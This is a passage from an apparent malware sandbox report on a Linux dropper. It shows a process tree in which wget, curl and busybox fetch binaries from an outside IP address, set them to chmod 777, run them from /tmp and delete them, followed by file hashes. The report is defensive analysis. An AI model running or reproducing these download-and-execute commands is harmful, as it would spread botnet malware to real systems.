/tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G./y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵
- Executes dropped EXE
PID:880
-
-
/bin/rmrm y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵PID:881
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵PID:882
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:883
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵PID:884
-
-
/bin/chmodchmod 777 gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc./gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵PID:887
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵PID:888
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97